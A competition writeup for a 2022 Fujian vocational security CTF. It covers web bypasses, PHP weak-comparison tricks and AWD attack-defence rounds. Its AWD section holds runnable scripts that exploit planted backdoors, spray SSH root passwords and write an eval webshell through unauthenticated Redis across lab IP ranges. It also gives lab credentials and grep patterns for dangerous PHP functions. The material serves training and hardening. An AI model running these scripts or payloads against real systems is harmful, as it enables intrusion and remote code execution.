2022 Fujian Provincial Vocational College Skills Competition, Information Security Management and Evaluation: Writeup (WP)
MISC
1. UTF-7 decoding
Decode the text with a UTF-7 tool on Win7.
2. Wireshark analysis
Filter for HTTP request packets and follow the stream.
3. Wireshark file export
File >>> Export Objects >>> HTTP
4. Repairing the PNG file header
Open the file in WinHex and set the file header to 89504E47 (the PNG signature); open the image to get the flag. 504E47
5. Pseudo-encrypted archive
Rename the file to a .rar archive. Open it in WinHex and change the encryption flag from 0009 to 0000; this yields key.txt. 59B0---6
WEB1
1. you are not admin
ctf=php://input, then POST the body "the user is admin".
2. File upload with a PHP blacklist: upload the file as .phP; the mixed case bypasses the extension check.
3. robots.txt
Visit this file to get the flag.
4. Brute-forcing a 6-digit numeric login
Brute-force the 6-digit password with Burp: 423987. The value returned is an encrypted value.
5. Not provided
WEB2
1. hello=welcome
Read the parameter names from the page source and write administrator into the cookie. "I can be administrator"
2. MD5 loose (weak-type) comparison
name[]=1 via POST, password[]=2&id=admin (md5() of an array returns NULL, so the two NULLs compare equal).
name=QNKCDZO, POST: password=240610708&id=admin (both md5 digests start with 0e followed by digits, so == treats them as numeric strings and compares 0 == 0).
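Both bypasses above rely on how PHP's == coerces types. The following is an added example, not code from the original writeup: a small Python model of PHP 5/7 loose comparison that shows why md5("QNKCDZO") == md5("240610708") and md5(array) == md5(array) both evaluate to true, and which also covers the true == "string" case used later in the unserialize challenge. The helper names (php_loose_eq, php_md5, md5_check_passes, find_magic_hashes) and the CANDIDATES list are assumptions made for the example.

```python
import hashlib
import re

# PHP's numeric-string grammar: optional sign, digits, optional fraction, optional exponent.
# A digest such as "0e8304..." matches it and evaluates to 0 * 10^n == 0.
_PHP_NUMERIC = re.compile(r'^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$')


def is_php_numeric(s):
    return isinstance(s, str) and _PHP_NUMERIC.match(s) is not None


def php_truthy(v):
    # PHP (bool) cast: "", "0", 0, NULL and an empty array are false.
    if isinstance(v, bool):
        return v
    if isinstance(v, (int, float)):
        return v != 0
    if isinstance(v, str):
        return v not in ("", "0")
    if isinstance(v, (list, dict)):
        return len(v) > 0
    return v is not None


def php_loose_eq(a, b):
    """Model of PHP's == for the cases these challenges depend on."""
    if isinstance(a, bool) or isinstance(b, bool):
        return php_truthy(a) == php_truthy(b)          # true == "admin" is true
    if a is None or b is None:
        if a is None and b is None:
            return True                                # NULL == NULL
        other = b if a is None else a
        return other == "" if isinstance(other, str) else not php_truthy(other)
    if isinstance(a, str) and isinstance(b, str):
        if is_php_numeric(a) and is_php_numeric(b):
            return float(a) == float(b)                # "0e123" == "0e456" is true
        return a == b
    return a == b                                      # array vs scalar is never equal


def php_md5(v):
    # md5() of an array returns NULL with a warning on PHP < 8 (PHP 8 raises a TypeError).
    if isinstance(v, (list, dict)):
        return None
    return hashlib.md5(str(v).encode()).hexdigest()


def md5_check_passes(name, password):
    """if (md5($name) == md5($password)) as PHP 5/7 evaluates it."""
    return php_loose_eq(php_md5(name), php_md5(password))


def find_magic_hashes(words):
    """Return the words whose md5 hex digest is a PHP numeric string (the '0e...' family)."""
    return [w for w in words if is_php_numeric(hashlib.md5(w.encode()).hexdigest())]


# Constructed inputs: the two values from the writeup plus an ordinary string.
CANDIDATES = ["QNKCDZO", "240610708", "admin"]

if __name__ == "__main__":
    print(find_magic_hashes(CANDIDATES))
    print(md5_check_passes("QNKCDZO", "240610708"), md5_check_passes(["1"], ["2"]))
```

The fix on the PHP side is strict comparison (===) or hash_equals(), and rejecting non-string input before calling md5(); neither of the two payloads survives that.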
3. Vim .swo swap file
Download .index.php.swo to get the flag.
4. Global variable bypass
GLOBALS
5. base64 in the source
The page source carries a base64 string.
where is flag?
include('flag.php');
$unserialize_str = $_POST['data'];
$data_unserialize = unserialize($unserialize_str);
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???')
{ print_r($flag); }
Generate the serialized payload with PHP:
<?php
$a = array('user'=>1,'pass'=>1);
$b = serialize($a);
print($b);
?>
a:2:{s:4:"user";i:1;s:4:"pass";i:1;}
a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
# Two key/value pairs, user=1 and pass=1. s:num gives the string length, b marks a boolean, i marks an integer. The b:1 (true) form is the one that passes the loose == check against an unknown string, because in PHP true == any non-empty string.
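To build the data parameter without a PHP interpreter at hand, here is an added example (not the writeup's own code) of a minimal PHP serialize() emitter in Python. It reproduces the two strings above exactly and also handles nested arrays, NULL and non-ASCII strings, where s:N must count bytes rather than characters. The function names php_serialize and build_payload are assumptions made for the example.

```python
def php_serialize(value):
    """Emit PHP serialize() output for None/bool/int/float/str and dict (a PHP array)."""
    if value is None:
        return 'N;'
    if isinstance(value, bool):            # test bool before int: bool is an int subclass
        return 'b:%d;' % int(value)
    if isinstance(value, int):
        return 'i:%d;' % value
    if isinstance(value, float):
        return 'd:%s;' % repr(value)
    if isinstance(value, str):
        raw = value.encode('utf-8')        # s:N counts bytes, not characters
        return 's:%d:"%s";' % (len(raw), value)
    if isinstance(value, dict):
        body = ''.join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return 'a:%d:{%s}' % (len(value), body)
    raise TypeError('unsupported type: %r' % type(value))


def build_payload(use_bool=True):
    """Serialized array for the data POST parameter.

    b:1 (true) loosely equals any non-empty string, so it matches whatever the
    real user/pass values are; i:1 only matches a secret that PHP converts to 1.
    """
    v = True if use_bool else 1
    return php_serialize({'user': v, 'pass': v})


if __name__ == "__main__":
    print(build_payload(False))   # a:2:{s:4:"user";i:1;s:4:"pass";i:1;}
    print(build_payload(True))    # a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
```

Send the b:1 form as data=... in the POST body; the braces and quotes must be URL-encoded if the client does not do it for you.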
AWD
root dcndcndcn
dcn dcn
Database: root:Dcnflag.123
Redis unauthenticated access
The instance runs with --protected-mode no, so anyone who can reach port 6379 can issue commands without a password.
/inc/config.php global backdoor: POST to the site root / with the request header Command: passthru('cat /flag');
conn.php global backdoor: POST the base64-encoded command as the request body; cat /flag base64-encodes to Y2F0IC9mbGFn.
File upload: uploadimg_form.php
Prepend a gif89a header, send Content-Type image/jpeg, and give the file a .php name.
Form field: name='G_fu_image[]'
# conn.php command execution: the body carries base64("cat /flag") for the conn.php backdoor
# and the Command header carries the passthru() call for the config.php backdoor; both go to /.
import re
import threading
import time

import requests


def find_flag(text):
    # Return the first flag{...} in the response, or None if there is none.
    res = re.findall(r'flag{.*?}', text)
    return res[0] if res else None


def conn(url):
    data = 'Y2F0IC9mbGFn'  # base64 of "cat /flag"
    head = {"Command": "passthru('cat /flag');"}
    try:
        req = requests.post(url=url, data=data, headers=head, timeout=5)
        print(url, find_flag(req.text))
    except Exception as e:
        print(url, e)


# Keep hitting every target host in turn; flags change each round, so loop forever.
urls = ['http://172.20.{}.101/'.format(i) for i in range(101, 121)]
while 1:
    for url in urls:
        threading.Thread(target=conn, args=(url,)).start()
        time.sleep(0.1)
# SSH connection script: try the same credential on every host and run a command
import threading

import paramiko


def ssh_con(host):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=host, username='root', password='a', timeout=20)
        # exec_command returns (stdin, stdout, stderr) file-like objects
        stdin, stdout, stderr = ssh.exec_command('whoami')
        flag = stdout.read().decode()
        print(host, flag)
    except Exception as e:
        print('[-]', host, e)
    finally:
        ssh.close()


for i in range(1, 10):
    host = '10.211.55.{}'.format(i)
    threading.Thread(target=ssh_con, args=(host,)).start()
# Redis unauthenticated access: write a webshell by pointing the RDB dump at the web root
import socket
import threading


def redis_conn(ip):
    s = socket.socket()
    s.settimeout(5)
    try:
        s.connect((ip, 6379))  # the port must be an int, not a string
        # Inline protocol: dump directory -> web root, dump filename -> con.php,
        # one key holding the PHP, then SAVE writes /var/www/html/con.php.
        # The RDB framing around the key is binary noise; PHP still runs the <?php ... ?> part.
        cmd = ("config set dir /var/www/html/\n"
               "config set dbfilename con.php\n"
               "set con.php \"<?php @eval($_GET[1]);?>\"\n"
               "save\n").encode('utf-8')
        s.sendall(cmd)
        f = s.recv(1024)  # first +OK (or an error such as -ERR/-DENIED)
        print(ip, f.decode('utf-8'))
    except Exception as e:
        print('[-]', ip, e)
    finally:
        s.close()


for i in range(101, 123):
    ip = '172.20.{}.101'.format(i)
    threading.Thread(target=redis_conn, args=(ip,)).start()
Hardening:
System layer:
Change the root password to MyTeam...
awk -F: '/bash$/{print $1}' /etc/passwd   list accounts whose login shell is bash (i.e. not nologin)
netstat -tunlp >>> kill -9   find unexpected listening ports and kill the process behind them
cat /etc/rc.local   boot-time startup tasks
cat /etc/crontab   scheduled tasks
pkill -kill -t pts/1   kick the session logged in on pts/1
tty1: a local console login
pts/x: a remote (ssh) login session
echo user:pass | chpasswd
echo newpass | passwd --stdin username   (--stdin is the RHEL/CentOS passwd option; on Debian/Ubuntu use chpasswd)
Database:
mysqladmin -uroot -proot password 'newpassword'
mysql -u root -h127.0.0.1 -p   log in to the database
- select user,host from mysql.user;   list all accounts
- delete any account whose host is %: delete from mysql.user where user='root' and host='%';
- set password for 'user'@'host'=password('newpassword');   (MySQL 5.7.6+/8.0 drop PASSWORD(); use alter user 'user'@'host' identified by 'newpassword';)
- flush privileges; service mysql restart   apply the changes and restart the database
Web layer:
find ./ -name '*.php' | xargs grep -n 'eval'   search the source for a dangerous function (also check shell_exec, passthru, system, assert)
find ./ -name '*.php' | xargs grep -n -E "eval|passthru|exec|shell"   search for several patterns at once
- Harden or remove the functions found and restrict file uploads (extension whitelist, not the blacklist bypassed above)
- Website directory permissions: chmod -R 000 /var/www/html (this also stops the web server from reading the site, so the service goes down; use it only as a last resort)